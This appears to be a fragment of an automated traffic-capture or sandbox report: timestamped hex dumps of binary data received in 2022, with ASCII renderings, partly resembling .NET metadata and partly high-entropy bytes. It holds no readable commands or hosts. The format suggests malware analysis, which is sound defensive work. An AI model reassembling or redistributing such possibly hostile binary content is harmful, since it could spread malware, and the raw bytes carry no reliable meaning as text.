                                                  2022-04-23 06:15:18 UTC1914INData Raw: 00 40 00 03 00 0a 00 03 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c
                                                  Data Ascii: @ pln)' ln)' ' n)' ' ' )' pln)
                                                  2022-04-23 06:15:18 UTC1916INData Raw: 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c a1 00 0c 00 00 0c c9 00 0b 00 00 0c 77 00 0a 00 00 0c 49 00 09 00 00 0c 22 00 08 00 00 0c 9a
                                                  Data Ascii: n)' ' ' n)' ' ' ' pln)' ln)' ' )' wI"
                                                  2022-04-23 06:15:18 UTC1917INData Raw: 0c 20 00 01 00 00 01 c9 00 1c 0e 32 00 91 00 00 00 00 85 00 01 c9 00 1c 0e 2a 00 96 00 00 00 00 83 74 01 c8 05 e7 0c 20 00 91 00 00 00 00 83 58 01 c8 04 64 0c 20 00 93 00 00 00 00 83 50 01 c7 05 e0 0c 20 00 91 00 00 00 00 83 34 01 c7 05 da 0c 20 00 93 00 00 00 00 83 2c 01 c6 05 ce 0c 20 00 93 00 00 00 00 82 dc 01 c5 05 c7 0c 20 00 93 00 00 00 00 82 90 01 c5 00 1c 0c 20 00 93 00 00 00 00 82 10 01 c5 00 1c 0c 20 00 93 00 00 00 00 81 a0 01 c5 00 1c 0c 20 00 93 00 00 00 00 80 c8 01 c5 02 57 0c 20 00 93 00 00 00 00 7f f4 01 c4 02 5b 0c 20 00 93 00 00 00 00 7f 64 01 c4 00 28 0d 88 18 86 00 00 00 00 7f 44 01 c4 05 c2 0c 20 00 93 00 00 00 00 7f 04 01 c3 05 bb 0c 20 00 93 00 00 00 00 7e e8 01 c3 05 b5 0c 20 00 93 00 00 00 00 7e cc 01 c3 05 af 0c 20 00 93 00 00 00
                                                  Data Ascii: 2*t Xd P 4 , W [ d(D ~ ~
                                                  2022-04-23 06:15:18 UTC1918INData Raw: 20 00 83 00 00 00 00 74 38 01 36 04 b6 0c 20 00 83 00 00 00 00 74 18 01 35 00 a8 0c 29 00 83 00 00 00 00 73 f8 01 35 01 76 0c 29 00 83 00 00 00 00 73 d8 01 34 01 71 0c 20 00 83 00 00 00 00 73 b8 01 34 00 2c 0c 20 00 83 00 00 00 00 73 98 01 33 00 a8 0c 27 00 83 00 00 00 00 73 78 01 33 01 76 0c 27 00 83 00 00 00 00 73 58 01 32 00 a8 0c 20 00 83 00 00 00 00 73 38 01 32 01 76 0c 20 00 83 00 00 00 00 73 18 01 31 00 23 0c 20 00 83 00 00 00 00 72 f8 01 31 00 30 0c 20 00 83 00 00 00 00 72 d8 01 31 00 28 0d 88 18 86 00 00 00 00 72 b8 01 31 00 1c 0c 20 00 93 00 00 00 00 72 3c 01 31 00 1c 0c 20 00 93 00 00 00 00 71 44 01 31 02 57 0c 20 00 93 00 00 00 00 70 4c 01 31 00 1c 0c 20 00 93 00 00 00 00 6e d0 01 31 00 28 0d 9d 05 c6 00 00 00 00 00 00 01 31 00 34 0d 9d 05 c6
                                                  Data Ascii: t86 t5)s5v)s4q s4, s3'sx3v'sX2 s82v s1# r10 r1(r1 r<1 qD1W pL1 n1(14
                                                  2022-04-23 06:15:18 UTC1920INData Raw: 03 b7 0d d9 01 c6 00 03 00 00 00 00 00 df 03 b1 0d d2 01 c6 00 03 00 00 00 00 00 dd 01 51 0d 88 18 86 00 03 00 00 00 00 00 dc 01 66 0d e5 01 c6 00 03 00 00 00 00 00 d8 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 d6 03 44 0d d2 01 c6 00 03 00 00 00 00 00 d4 01 51 0d 88 18 86 00 03 00 00 00 00 00 d2 03 a8 0d e5 01 c6 00 03 00 00 00 00 00 cb 03 98 0d d9 01 c6 00 03 00 00 00 00 00 c6 03 8d 0d d2 01 c6 00 03 00 00 00 00 00 c4 01 51 0d 88 18 86 00 03 00 00 00 00 00 c1 03 80 0d e5 01 c6 00 03 00 00 00 00 00 b5 03 69 0d d9 01 c6 00 03 00 00 00 00 00 ab 03 57 0d d2 01 c6 00 03 00 00 00 00 00 a9 01 51 0d 88 18 86 00 03 00 00 00 00 00 a8 01 66 0d e5 01 c6 00 03 00 00 00 00 00 a4 03 4b 0d d9 01 c6 00 03 00 00 00 00 00 a2 03 44 0d d2 01 c6 00 03 00 00 00 00 00 a0 01 51 0d
                                                  Data Ascii: QfKDQQiWQfKDQ
                                                  2022-04-23 06:15:18 UTC1921INData Raw: 00 00 3e 01 af 0c 20 20 93 00 80 00 00 00 00 00 3b 01 a6 0c 20 20 93 00 80 00 00 00 00 00 37 01 9e 0c 20 20 93 00 80 00 00 00 00 00 32 01 93 0c 20 20 93 00 80 00 00 00 00 00 32 01 8f 0c 20 20 93 00 80 00 00 00 00 00 31 01 89 0c 20 20 93 00 80 00 00 00 00 00 30 01 71 0c 29 00 83 00 00 00 00 3c f4 00 30 00 2c 0c 29 00 83 00 00 00 00 3c d4 00 2f 01 7f 0c 20 00 83 00 00 00 00 3c b4 00 2f 01 7a 0c 20 00 83 00 00 00 00 3c 94 00 2e 00 a8 0c 20 00 83 00 00 00 00 3c 74 00 2e 01 76 0c 20 00 83 00 00 00 00 3c 54 00 2d 01 71 0c 27 00 83 00 00 00 00 3c 34 00 2d 00 2c 0c 27 00 83 00 00 00 00 3c 14 00 2c 01 71 0c 20 00 83 00 00 00 00 3b f4 00 2c 00 2c 0c 20 00 83 00 00 00 00 3b d4 00 2c 00 28 0d 88 18 86 00 00 00 00 3b b4 00 2b 01 66 0d e5 01 c6 00 03 00 00 00 00 00 28
                                                  Data Ascii: > ; 7 2 2 1 0q)<0,)</ </z <. <t.v <T-q'<4-,'<,q ;,, ;,(;+f(
                                                  2022-04-23 06:15:18 UTC1922INData Raw: 00 33 00 9d 0c 6e 00 01 00 9d 0c 29 00 01 00 9d 0c 27 00 01 01 11 0c 20 00 01 02 dc 0c 20 00 11 02 d7 0c 6e 80 56 02 d7 0c 29 80 56 02 d7 0c 27 80 56 02 d7 0c 20 80 56 00 20 0d bb 06 06 00 20 0c 22 00 01 00 9d 0c 9a 00 01 02 b4 0c 70 00 01 00 9d 0c 6c 00 06 00 9d 0c 6e 00 01 00 20 0c 29 00 01 02 af 0c 27 00 01 00 20 0c 20 00 01 02 aa 0c 27 00 01 00 9d 0c 20 00 21 00 9d 0c a1 00 01 00 9d 0c c9 00 06 00 89 0c 77 00 06 00 89 0c 49 00 06 00 89 0c 22 00 06 00 89 0c 9a 00 06 00 89 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 9d 0c 27 00 01 00 9d 0c 20 00 06 00 20 0c 29 00 01 00 20 0c 27 00 01 01 6d 0c 20 00 01 02 73 0c 20 00 33 00 89 0c 9a 00 06 00 9d 0c 70 00 06 00 89 0c 6c 00 06 00 9d 0c 6e 00 06 00 9d 0c 29 00 06 00 89 0c 27 00 06 02
                                                  Data Ascii: 3n)' nV)V'V V "pln )' ' !wI"pln)' ) 'm s 3pln)'
                                                  2022-04-23 06:15:18 UTC1924INData Raw: ba 00 6c 01 79 00 00 0c 9c 00 00 01 80 00 b6 00 6c 01 65 00 00 0c 9a 00 00 01 05 00 b2 00 6c 01 65 00 00 0c 70 00 00 01 05 00 ae 00 6c 01 65 00 00 0c 6e 00 00 01 05 00 aa 00 6c 01 65 00 00 0c 6c 00 00 01 05 00 a6 00 6c 01 65 00 00 0c 77 00 00 01 05 00 a2 00 6c 01 65 00 00 0c 29 00 00 01 05 00 9e 00 6c 01 65 00 00 0c 49 00 00 01 05 00 9a 00 6c 01 65 00 00 0c 27 00 00 01 05 00 96 00 6c 01 65 00 00 0c 22 00 00 01 05 00 92 00 6c 01 65 00 00 0c 20 00 00 01 05 00 91 00 62 01 79 00 00 0c 95 00 10 01 80 00 88 00 5e 00 30 00 00 0c 90 00 10 01 00 00 84 00 5e 01 79 00 00 0c 8b 00 10 01 80 00 82 00 5d 01 79 00 00 0c 86 00 10 01 80 00 82 00 58 00 cd 00 00 0c 81 00 00 01 00 00 81 00 58 01 79 00 00 0c 7c 00 10 01 80 00 80 00 58 01 79 00 00 0c 77 00 10 01 80 00 7f 00 58
                                                  Data Ascii: lyleleplenlellewle)leIle'le"le by^0^y]yXXy|XywX
                                                  2022-04-23 06:15:18 UTC1925INData Raw: 05 33 05 b3 00 06 05 33 05 9e 00 06 05 33 05 94 00 06 05 33 05 86 00 06 05 33 05 7c 00 06 05 4d 05 71 00 0e 05 4d 05 63 00 0e 05 4d 05 3d 00 0e 05 33 05 24 00 06 00 35 05 18 00 06 00 35 05 0b 00 06 04 f6 04 ea 00 06 00 35 04 e7 00 06 00 35 04 dd 00 06 00 00 04 cf 00 d3 00 35 04 c3 00 06 00 35 04 be 00 06 00 26 04 b9 00 0a 00 26 04 af 00 0a 00 35 04 a8 00 06 03 d7 04 9e 00 0e 03 d7 04 93 00 06 03 d7 04 88 00 06 03 d7 04 75 00 0e 03 d7 04 64 00 0e 03 d7 04 4c 00 0e 03 d7 04 3e 00 0e 03 d7 04 36 00 0e 03 d7 04 19 00 06 03 d7 04 01 00 06 03 d7 03 ea 00 06 03 d7 03 bc 00 06 00 35 03 b3 00 06 00 35 03 aa 00 06 00 35 03 a2 00 06 03 8c 03 7d 00 0e 03 5e 03 4a 00 0e 03 14 03 33 00 06 03 14 03 27 00 06 03 14 03 08 00 06 02 b6 03 01 00 06 02 b6 02 ed 00 06 02 b6 02
                                                  Data Ascii: 33333|MqMcM=3$555555&&5udL>6555}^J3'
                                                  2022-04-23 06:15:18 UTC1926INData Raw: 05 85 2a 5d 53 4f 63 20 0c 87 9a ac c5 0f 1d 85 2a 5d 6d a9 93 55 f2 30 c8 15 29 db 13 07 85 2a 5d 71 68 2a 36 07 15 53 7b 6e 85 d8 cc 85 2a 52 80 95 6c db 40 a8 9f 70 fa d5 ad 6d dc 6f 93 0d 79 04 3f b1 4a 74 65 de af 18 13 60 5e af f1 e4 33 ca af 4d 52 bf f0 69 e6 80 ae ac 41 34 7d 85 2a 52 9a 33 d0 90 44 8e 85 2a 52 c1 bd 69 59 14 85 2a 52 ca 48 8f 83 df d2 d1 f9 65 32 85 86 c5 df 4d 59 76 bb 78 93 fb 9e 28 09 36 95 10 05 20 7b 85 2a 52 f6 8b 05 ff d3 c3 5d 33 11 51 59 c3 5c 15 ac b3 50 16 4a ce 01 0d 85 2a 52 17 eb cf e0 30 0e 97 98 c4 ea 98 b7 09 44 cc fb e2 88 3c f4 20 6a c0 1a c5 0a 85 2a 52 34 5a 6b 71 8e a2 dd 19 a2 df f4 7e bf 4c 39 bb 63 42 38 34 88 12 b0 4f e5 1d 21 e8 9f 90 00 b9 4c a6 85 2a 52 59 67 fb 12 2d bd 3b cb e1 85 2a 52 56 b4 fb f2
                                                  Data Ascii: *]SOc *]mU0)*]qh*6S{n*Rl@pmoy?Jte`^3MRiA4}*R3D*RiY*RHe2MYvx(6 {*R]3QY\PJ*R0D< j*R4Zkq~L9cB84O!L*RYg-;*RV
                                                  2022-04-23 06:15:18 UTC1928INData Raw: d0 44 01 70 72 69 bc c2 85 2a 57 a4 0e a6 4d b8 85 2a 57 c5 7a 63 3d 50 fe 8d 1d 90 49 ef 4c cc 41 ef 3f 85 2a 57 db 6b 8d 97 bd 29 83 f9 51 bb 51 85 2a 57 e2 e7 64 c1 b4 81 22 a4 ab a9 13 49 6e de 00 14 16 1d c2 10 15 c4 0d d3 f0 e0 04 6c e1 ee 5f 02 85 2a 57 14 f4 fb dc c6 90 b9 cd 42 da 58 ec 1b a8 a2 64 a5 15 2f ef f2 0f dc d0 60 2a 1d 80 85 2a 57 3f 57 66 f9 dc ba b7 f8 d6 dd 3e 39 85 2a 57 3e 65 32 50 91 fd 21 14 85 2a 57 45 a4 a9 cb 51 ee bc 61 85 2a 57 48 c9 cf 74 5b 70 c1 98 bf aa 3d 70 1e ef 31 85 2a 57 55 26 99 9a 4a 63 85 2a 57 65 a0 f9 dd ad 1f 0d 84 d0 2c 85 2a 57 72 e4 93 35 fd 4b 16 6a 59 11 b5 1a fd e1 a9 ec e8 b9 c6 11 38 a0 68 92 42 85 2a 54 85 f3 6d 6b 0f b3 49 4a 8b 8c e0 31 a9 bc 5c dc ba 57 69 20 8f 8c 00 df 7e 26 70 c7 7a 85 47 66
                                                  Data Ascii: Dpri*WM*Wzc=PILA?*Wk)QQ*Wd"Inl_*WBXd/`**W?Wf>9*W>e2P!*WEQa*WHt[p=p1*WU&Jc*We,*Wr5KjY8hB*TmkIJ1\Wi ~&pzGf
                                                  2022-04-23 06:15:18 UTC1929INData Raw: e8 dc 7c 98 0c 48 e8 0c 98 98 38 dc 48 38 98 7c e8 dc 7c 98 0c 48 e8 0c 98 98 38 dc 48 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 a7 07 e3 77 43 e3 07 93 d7 77 93 07 07 a7 43 d7 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b 1b bb 5f cb ff 5f bb 2f 6b cb 2f bb bb 1b ff 6b ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd ad 0d e9 7d 49 e9 0d 99 dd 7d 99 0d 0d ad 49 dd 15 b5 51 c5 f1 51 b5 21 65 c5 21 b5 b5 15 f1 65 15 b5 51 c5 f1 51 86 c1 65 c5 21 b9 b5 10 d1 65 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 66 82 16 66 c6 22 b6 82 22 c6 52 16 b6 52 c6 c6 26 a2 16 3c 46 5d c9 fd 5d b9 41 05 ad 03 dc dc 6b 92 0a 6a d4 5d a7 94 3c f4 41 05 8d 5f d6 fa 46 fd 69 ea 4a ae 3a 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a ea 4f 8d fa 0e ae 4a de 9a 3a de 4a 4a ea 0e 9a 8c 2c
                                                  Data Ascii: |H8H8||H8HwCwCwCwC__/k/k__/k/k}I}I}I}IQQ!e!eQQe!ef""RRff""RR&<F]]Akj]<A_FiJ:J:JJOJ:JJ,
                                                  2022-04-23 06:15:18 UTC1930INData Raw: a3 d3 76 59 4e 51 4c ed c3 ec 3b 72 8a a0 71 06 b6 7b 39 59 c2 fe 65 f9 4a fd 9d e1 c6 f5 e1 a1 37 52 b1 37 df 7f e2 65 b7 59 35 7c b0 39 a5 74 1e c6 07 80 23 41 d9 02 6f f9 2e 50 6f 0c 03 32 5d 8f d1 62 1f be 39 2a 50 53 2d 41 e0 35 81 9b cd 10 19 eb f9 0d 63 03 e0 07 6f 26 c8 c1 d6 e0 b6 70 3b 68 47 4a a7 eb 91 f8 f1 31 4f a1 ab 01 b7 25 d0 ec cb cb a7 b9 9b 91 b5 2d 80 96 5a 13 d8 1e 5d 6d 96 44 e8 5c 48 39 56 fb 91 26 5c 2b 46 2c 85 9c 59 a8 6c b6 68 22 79 fb 55 7c c8 44 b1 71 c7 47 15 3e 8e 98 f4 bd e1 b5 9c f9 51 a4 4a c9 f5 7a 8a 9f 78 99 be 19 fd bc e2 27 a6 ef 78 15 63 fd 50 b9 34 c5 e5 99 3c 2f 81 4a 26 9d 4b 3f 3d ca 7d fa e8 d0 4b 51 53 a6 5f 8b 70 51 8f 34 bd 3b d3 56 3f bd 76 78 d1 32 e3 14 aa ec 05 66 7a 89 7c aa 4a 79 73 e1 d1 f6 1e 62 30
                                                  Data Ascii: vYNQL;rq{9YeJ7R7eY5|9t#Ao.Po2]b9*PS-A5co&p;hGJ1O%-Z]mD\H9V&\+F,Ylh"yU|DqG>QJzx'xcP4</J&K?=}KQS_pQ4;V?vx2fz|Jysb0
                                                  2022-04-23 06:15:18 UTC1931INData Raw: b5 f4 cf 5e 00 fd 4a bc e4 1f e8 29 11 a1 6d 07 61 77 cc 0d 29 80 6b 0e b6 e8 5b 48 5f a0 72 fd c9 36 9a a4 2a 96 57 85 c2 a2 79 a5 f1 6d 4a 40 6e 92 fd 98 1d 88 b3 cc b9 64 51 37 44 18 21 fa 64 d2 4d 2e 09 0b 05 97 2c f0 e7 ae 38 7a ff ed 3b f2 35 e2 c5 9f 11 fb 72 66 14 cc 4d 16 44 82 76 68 52 5e 23 f0 72 01 90 c3 60 24 36 cb c7 e2 27 41 58 3b 41 28 83 e0 47 b6 d7 46 a1 1d 72 c1 6d 4d 8d 0c df 95 03 78 63 cc 93 56 e1 b2 20 65 dd 50 42 58 3f 0d a2 89 b9 d0 fa 42 e2 64 50 98 94 9b a4 cd 8c f0 9a 49 05 f3 0a e8 3d 85 21 46 42 d5 da ae b3 8b ed 1c bf 13 63 99 1f b7 c4 2b 19 b4 b6 98 70 3d 44 34 76 68 00 b3 c0 11 9a 18 1c 72 b7 fc 71 58 da 68 49 ec 62 aa a9 72 2b 08 3b d1 5b 8f 91 5b 51 78 76 bf fb bc ee 77 1e 82 15 dd 9d 6e 5e 40 fc 40 c3 93 17 d6 c9 dd 7a
                                                  Data Ascii: ^J)maw)k[H_r6*WymJ@ndQ7D!dM.,8z;5rfMDvhR^#r`$6'AX;A(GFrmMxcV ePBX?BdPI=!FBc+p=D4vhrqXhIbr+;[[Qxvwn^@@z
                                                  2022-04-23 06:15:18 UTC1933INData Raw: 9e 10 7a b3 26 6c ff fa ef 10 c2 d5 af 03 e3 7f c3 a8 68 64 b4 19 4d 2d 53 96 35 24 8f 66 0a a3 27 8d de 0f 96 0f 73 74 71 ee 03 af e0 74 cb b4 b6 c6 d5 a6 6b d3 13 c0 04 01 4d fb a8 9b 0b cd 20 b8 c6 f2 b2 a2 13 ca 7f df d2 32 bd 90 7d 65 28 1b a2 05 09 ad f1 69 b4 ba 69 2f 74 b0 a8 30 37 7d 6d eb be d3 f6 0e 6f 84 9f c8 04 61 b2 0a 84 3d 73 f1 c0 79 d8 50 6b 36 19 bc 68 af 7f 99 1f 8a 74 97 e1 35 45 cd 5e 2e 7b be fb 2c 38 c3 a0 be 55 de 10 ca 9b 8b 65 40 24 03 cd bc 8f 52 5d b1 40 e0 87 bf a8 b7 d1 80 aa 75 94 99 07 c4 8a e1 e8 f4 9b a0 f7 96 b7 a9 c5 cc bd c7 6a 8d cd cf 7b 9b fa f4 f6 ed cd b7 b1 fa 31 f1 94 90 d7 03 38 e7 23 d5 25 54 1b 68 16 b6 0a ee 61 61 e1 1e 58 8c fd 30 1d 59 46 4a fd 48 49 2b 9e f2 71 41 71 b8 20 4c 92 c0 44 31 55 e9 f9 bc ea
                                                  Data Ascii: z&lhdM-S5$f'stqtkM 2}e(ii/t07}moa=syPk6ht5E^.{,8Ue@$R]@uj{18#%ThaaX0YFJHI+qAq LD1U
                                                  2022-04-23 06:15:18 UTC1934INData Raw: 72 4d 50 82 d9 72 1c 77 85 6b 8a 12 25 9d 33 61 5d 14 c7 46 ca aa 38 a2 0c d7 bb f1 e2 dc 3a 70 d6 15 fd a8 0c e4 77 bf 00 0b 66 ac 26 75 50 6a 19 e6 02 51 fb 16 bc 6a 2e be f6 95 98 97 3a 37 68 fb 47 d8 1d 96 f6 7a 62 f5 2e 49 6c 05 27 10 46 c4 cd 07 07 63 cf db a1 0a 46 9e 4f be 87 e8 f2 e5 eb d9 73 7b d1 df 1d 39 f7 28 21 af 15 84 40 fd ec 9c 8c bc bc 52 e9 4e 10 93 d5 39 a1 f4 ba f9 03 24 21 e5 66 0a 46 35 f2 0a 17 24 94 d6 7b 0a 0b 65 b2 44 44 81 d7 46 19 d2 0a 6c be 8a cf 4c 89 be fb a7 ef 7a 22 90 ec 0f 8b d1 57 14 d4 e0 96 5e 4e 58 0e 9b 12 91 ac 49 c5 55 4a 1c 63 13 7a a2 ee 38 4b 87 18 f7 2a d5 53 0a 22 b7 03 7b a5 eb c7 61 8d 87 60 84 1a ff 72 66 d2 54 f4 c0 db 88 ad 42 1e b5 1d 3d e4 60 3b 77 51 b7 db 5f ec 7b 9d 55 f7 80 88 eb 6f c6 1d 31 d9
                                                  Data Ascii: rMPrwk%3a]F8:pwf&uPjQj.:7hGzb.Il'FcFOs{9(!@RN9$!fF5${eDDFlLz"W^NXIUJcz8K*S"{a`rfTB=`;wQ_{Uo1
                                                  2022-04-23 06:15:18 UTC1935INData Raw: 7a 1c 80 5a ce 37 9e 5a 4e 65 c8 41 14 15 bc 6c 5b 8e 6b 86 df 1e da e5 de 0f 00 f7 0a ed 54 2f 83 5d 2f fd a9 1b 82 70 99 3e 60 7b 07 29 bf 04 dd c0 66 c6 3d bc 13 f3 20 1d 9c 24 99 c1 7e 9c 5e 0b f5 3f e4 23 a3 72 83 e8 56 43 79 88 6e da 0e 7a 20 b4 d6 4b 5d e7 ca 6d 41 97 67 04 36 d7 31 1f 2f 9a 84 e8 9a 48 03 a7 f8 ae 5a 09 7b 26 3c 30 50 cf 25 27 b0 e5 1a 83 a8 3f 00 6b 09 7f 5a 89 22 f5 2c 32 ee 8b 4a 6c 54 55 03 3f 25 6b f7 2d b8 b3 48 ac 78 0f 59 2b 38 47 3c 9f f4 0d 50 77 eb 95 a8 f4 1c 59 50 a0 83 8b fe 91 7b 2b 90 a2 66 47 02 b1 d8 fc 2f 50 c9 36 2f 6b f1 e7 f4 e0 04 46 ca e3 ab 26 9b be 87 49 c9 a9 f1 5d 15 b4 65 ef 89 07 e3 d9 20 87 46 bc c3 4a 74 70 84 36 65 cb d6 0f 2d 39 ae e3 46 6f 50 0f 6c de 00 ef b8 2e cd cb 5a c8 6a 42 f0 68 e0 47 58
                                                  Data Ascii: zZ7ZNeAl[kT/]/p>`{)f= $~^?#rVCynz K]mAg61/HZ{&<0P%'?kZ",2JlTU?%k-HxY+8G<PwYP{+fG/P6/kF&I]e FJtp6e-9FoPl.ZjBhGX
                                                  2022-04-23 06:15:18 UTC1937INData Raw: 0e 34 57 28 f4 91 70 e8 23 59 7c 16 e5 b9 7b 5a 68 81 f8 38 d3 1d 7a 1f 04 53 67 fa bb a0 73 cb de 85 8c e7 cd db 38 ef a5 47 0f ae 0a 41 72 84 17 6b d9 c0 f9 2b 0b 7b 6f 8c 8f 82 fb 84 a8 ce 57 63 f9 64 b5 9d 6b e0 f6 34 98 4b e7 8a aa 32 d6 ea 8d 19 d2 25 5b 1a 7d 7e d4 51 1c 4b 76 a5 cd 16 f2 98 f7 c1 a5 5e 0e 54 de 4f e9 bd cb 44 1a 0d 52 35 7d 0c d4 38 d2 11 d8 6f 46 8d 2c 87 91 b6 b7 a0 80 8b 9a 54 53 ff 42 0f 5e 17 1c 97 99 81 e5 8c c2 77 fb 1e 05 86 c0 c3 40 fd d7 66 ba 8b b5 e6 06 ce 4f 68 7f a2 42 85 6f 55 ec 25 ae 9e 13 a5 fc 0a e2 a6 dc d1 9b d6 da 1d 74 47 27 33 9b b9 b8 f7 1b 69 e7 7c ca 21 37 68 f1 5c b3 47 5f 32 7d 8f 5c 2c c2 aa 03 a6 9e 4e 4b ed 75 00 fd 35 1b ec 9e 19 18 a9 7e 4a 96 17 b8 4c 4a df 20 6c 96 c0 83 73 c8 1f 9d 97 6c a2 5d
                                                  Data Ascii: 4W(p#Y|{Zh8zSgs8GArk+{oWcdk4K2%[}~QKv^TODR5}8oF,TSB^w@fOhBoU%tG'3i|!7h\G_2}\,NKu5~JLJ lsl]
                                                  2022-04-23 06:15:18 UTC1938INData Raw: be 21 fa 6e 8b 74 fe 93 e8 06 8c e7 ec b9 7c d6 2c d2 15 80 cd de ce 26 93 0c 40 b2 03 a9 6c e3 57 f9 df a7 a2 14 ee bf 58 4e ce 81 f2 1c 59 f2 28 a9 8b 9b 93 3f 94 a1 e9 fc 42 1c cc cf b5 60 05 6d ae 5b f7 19 a8 b8 5c 1f 7f b6 06 be ec 04 46 e8 c8 ba 30 a7 6b 6f f3 d9 8d 55 1b 31 78 b7 84 08 59 43 28 95 21 54 0a 33 37 97 81 4b e7 74 ad e6 8f 53 ba a1 18 2e 9c 5f f1 26 bb 04 7f d6 4b 84 04 3e f1 9c 2d ea 30 26 51 9d b6 a2 dd ea 47 0c f4 73 90 a6 51 6a 0d c5 50 23 fa a4 4a 83 e2 47 dd 41 48 45 81 9b e7 73 29 4e 36 0c dc 40 ef bc b6 b3 68 ea fd 53 c9 2f dc 7b d1 14 e2 ce fe 32 ee 0c a8 1e 81 7c 38 bf 5d 02 cc 30 16 36 01 e0 53 d8 cc f7 2d a1 94 d4 c0 21 e2 c2 a7 1d c6 5f 5b 42 8f 40 43 79 c3 38 ca 7a 15 50 cd e3 e7 25 2f d3 47 b3 fe e2 75 9d 5a 85 ad 55 d6
                                                  Data Ascii: !nt|,&@lWXNY(?B`m[\F0koU1xYC(!T37KtS._&K>-0&QGsQjP#JGAHEs)N6@hS/{2|8]06S-!_[B@Cy8zP%/GuZU
                                                  2022-04-23 06:15:18 UTC1939INData Raw: 46 8d 86 64 7e b4 7f ed 71 46 8b 6e 43 1e 05 a6 9b 28 00 06 28 cb 94 d3 55 cc d2 ed ba 99 72 50 e6 87 6e fa be f2 da b5 13 d2 9a 93 cd 05 71 fb b4 0b f0 c0 d2 c4 78 69 87 8d 63 ff 89 d8 48 74 ad a5 a5 a7 85 a3 d1 8c 2b 7c 09 e8 7c b1 3b d0 a9 e6 c6 90 67 1e 1d c6 ce a0 e8 30 b3 6f b8 4b 06 1b e8 0e 09 ed 5e 08 a9 3b e5 3f 02 65 d0 ba ac 53 6f ea cc ed d6 08 86 4a 76 d9 1b 2b dc d0 0f fa e7 36 2a ae 30 75 20 24 9f 7e 62 96 5c 18 7a fe 40 d4 98 ad bf e5 7c 72 b1 80 1b 7c 19 27 c7 6c 34 11 a4 6f fc a4 af 89 a3 4f 5d eb 2a 09 2f 6c 39 29 4f b2 ec c3 cc 95 ee 76 64 dc e1 62 4c cb e5 e8 a0 5b 06 dc 0f 19 96 0f f1 ab 88 ec 21 40 3c 53 70 5e 38 14 75 00 70 65 64 93 6c 5f ad eb 74 94 8f b1 60 87 ab 80 5d 3f fa f0 d5 9c e8 22 8f 36 2f ff 7a 17 48 05 2f e2 62 b9 19
                                                  Data Ascii: Fd~qFnC((UrPnqxicHt+||;g0oK^;?eSoJv+6*0u $~b\z@|r|'l4oO]*/l9)OvdbL[!@<Sp^8upedl_t`]?"6/zH/b
                                                  2022-04-23 06:15:18 UTC1941INData Raw: 89 86 04 b1 4a 13 82 90 cc a6 ee c7 22 84 bd b1 5a db a4 97 1c 95 d0 92 d6 0f c4 b4 00 4d db 96 ce b7 3b 14 bb c0 96 f2 d3 d9 bf 94 a3 9e 63 6a d7 d8 8a 2c 84 67 36 8b 11 9f 77 fe 95 d9 62 59 bb 3f 60 29 c7 3d 23 e7 98 3f d0 88 5b de d2 4b 90 ca 5a dc 60 53 48 66 ac 4e 62 ef 58 85 01 df 76 b4 9f ae a5 92 d7 c5 33 bf e9 d9 cb a9 c4 5b 3f a0 2c c3 a2 73 23 31 4a f5 1c d9 43 49 a7 94 9d fa f4 8f 66 e9 d5 36 a9 ec ec 2b 5b 49 d8 ff ba 7a 14 9c bd 87 60 a7 b8 8f fe ea d7 95 b9 a7 c0 ce 7e ea 07 33 8d 57 e6 fc 8f d0 17 1d a9 a4 82 12 c3 ab df 2d 11 28 19 06 14 7c db f9 0f ba f7 d5 7e d7 3f 26 44 9b 48 e8 5d fb 64 13 14 24 94 27 00 2e 7d 5b a5 10 72 5d e5 62 e4 6d 5d b8 38 1c 6a 9f ec bf e0 a5 e1 36 9d 77 c5 75 dc ea fd 57 ff 3d 3f 73 db 8a cf 75 13 1a ff 65 52
                                                  Data Ascii: J"ZM;cj,g6wbY?`)=#?[KZ`SHfNbXv3[?,s#1JCIf6+[Iz`~3W-(|~?&DH]d$'.}[r]bm]8j6wuW=?sueR
